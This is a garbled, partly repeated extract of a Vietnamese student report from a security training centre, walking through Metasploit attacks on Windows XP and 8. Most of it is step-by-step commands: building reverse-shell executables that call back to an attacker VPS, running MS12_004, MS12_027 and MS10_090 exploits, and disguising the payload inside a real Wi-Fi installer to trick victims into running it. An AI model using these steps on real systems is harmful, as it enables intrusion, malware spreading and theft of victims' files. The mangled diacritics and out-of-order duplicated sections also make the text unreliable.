Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
